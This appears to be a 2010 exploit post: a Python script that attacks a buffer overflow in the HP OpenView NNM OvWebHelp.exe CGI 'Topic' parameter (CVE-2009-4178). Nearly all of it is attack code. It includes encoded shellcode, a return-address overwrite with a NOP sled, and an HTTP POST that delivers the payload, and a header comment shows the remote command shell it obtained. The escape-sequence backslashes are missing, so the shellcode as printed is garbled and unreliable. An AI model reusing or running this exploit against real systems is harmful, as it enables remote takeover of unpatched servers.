HP OpenView NNM OvWebHelp.exe CGI Topic overflow
Posted on 30 March 2010
================================================ HP OpenView NNM OvWebHelp.exe CGI Topic overflow ================================================ #!/usr/bin/python # Exploit title: HP OpenView NNM OvWebHelp.exe CGI Topic overflow # Date: 2010.03.30 # Software link: hp.com<http://hp.com> # Version: 7.53 # Tested on: Windows 2003 SP2 # CVE: 2009-4178 # Code: ############################################ # Trying 172.16.29.130... # Connected to 172.16.29.130. # Escape character is '^]'. # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # # C:Program FilesHP OpenViewwwwcgi-bin> ############################################ import struct import socket import httplib import urllib #[*] x86/alpha_mixed succeeded with size 746 (iteration=1) sc =( "x89xe3xd9xc3xd9x73xf4x5dx55x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x4bx4cx49x78x4ex69x45x50x45x50x43x30x45x30x4e" "x69x48x65x44x71x4bx62x45x34x4ex6bx51x42x44x70" "x4cx4bx43x62x44x4cx4ex6bx50x52x44x54x4ex6bx43" "x42x45x78x44x4fx4ex57x50x4ax45x76x50x31x4bx4f" "x46x51x49x50x4cx6cx45x6cx43x51x43x4cx45x52x46" "x4cx47x50x4fx31x48x4fx44x4dx43x31x49x57x4bx52" "x48x70x51x42x43x67x4cx4bx50x52x46x70x4ex6bx47" "x32x45x6cx47x71x48x50x4cx4bx47x30x44x38x4fx75" "x49x50x50x74x51x5ax43x31x4ax70x42x70x4cx4bx43" "x78x46x78x4ex6bx43x68x45x70x47x71x48x53x4ax43" "x45x6cx47x39x4cx4bx47x44x4cx4bx47x71x4ax76x44" "x71x4bx4fx45x61x49x50x4cx6cx4bx71x4ax6fx44x4d" "x45x51x4ax67x47x48x4bx50x43x45x4bx44x46x63x51" "x6dx49x68x45x6bx51x6dx46x44x43x45x4dx32x46x38" "x4ex6bx42x78x44x64x45x51x49x43x45x36x4cx4bx44" "x4cx50x4bx4ex6bx50x58x47x6cx45x51x49x43x4ex6b" "x46x64x4ex6bx47x71x4ex30x4fx79x50x44x46x44x51" "x34x43x6bx43x6bx43x51x51x49x42x7ax46x31x49x6f" "x4bx50x50x58x43x6fx50x5ax4cx4bx44x52x48x6bx4b" "x36x51x4dx51x78x45x63x46x52x43x30x43x30x43x58" "x42x57x42x53x46x52x51x4fx50x54x51x78x42x6cx50" "x77x47x56x47x77x4bx4fx4bx65x4cx78x4ax30x47x71" "x47x70x43x30x51x39x49x54x51x44x50x50x45x38x46" "x49x4dx50x50x6bx43x30x49x6fx49x45x50x50x42x70" "x50x50x42x70x43x70x50x50x47x30x50x50x51x78x49" "x7ax44x4fx49x4fx4bx50x4bx4fx4bx65x4ex69x4fx37" "x50x31x49x4bx51x43x45x38x44x42x47x70x47x61x51" "x4cx4ex69x4bx56x43x5ax46x70x42x76x51x47x50x68" "x4bx72x49x4bx44x77x43x57x4bx4fx49x45x50x53x43" "x67x45x38x48x37x49x79x44x78x49x6fx4bx4fx4ex35" "x51x43x51x43x51x47x45x38x50x74x48x6cx47x4bx49" "x71x49x6fx4ax75x42x77x4dx59x48x47x51x78x44x35" "x42x4ex42x6dx50x61x49x6fx49x45x50x68x42x43x42" "x4dx51x74x43x30x4dx59x49x73x50x57x46x37x43x67" "x50x31x48x76x42x4ax45x42x46x39x46x36x4dx32x49" "x6dx42x46x48x47x43x74x46x44x47x4cx47x71x43x31" "x4ex6dx43x74x51x34x46x70x4fx36x43x30x42x64x46" "x34x42x70x50x56x50x56x43x66x42x66x51x46x50x4e" "x46x36x43x66x46x33x43x66x51x78x44x39x48x4cx47" "x4fx4cx46x4bx4fx4bx65x4ex69x4dx30x42x6ex50x56" "x43x76x49x6fx46x50x43x58x44x48x4dx57x47x6dx51" "x70x49x6fx4ax75x4dx6bx4cx30x4cx75x4fx52x43x66" "x42x48x4dx76x4fx65x4dx6dx4fx6dx49x6fx48x55x47" "x4cx47x76x43x4cx45x5ax4bx30x4bx4bx4dx30x44x35" "x43x35x4fx4bx51x57x42x33x51x62x50x6fx43x5ax45" "x50x42x73x49x6fx4ax75x46x6ax41x41") data="A"*57 data2 = "B"*5000 ret = "xDFxf2xe5x77" + "x90" * 254 + sc # call esp kernel32.dll payload = data + ret p = urllib.urlencode({'Topic':payload,'Target':data2}) h = {"Content-Type": "application/x-www-form-urlencoded","Accept": "text/html","User-Agent": "BackTrack", "Accept-Language": "en"} c = httplib.HTTPConnection('172.16.29.130') c.request("POST","/OvCgi/OvWebHelp.exe",p,h) r = c.getresponse() print r.status, r.reason c.close() print " Done " # Inj3ct0r.com [2010-03-30]
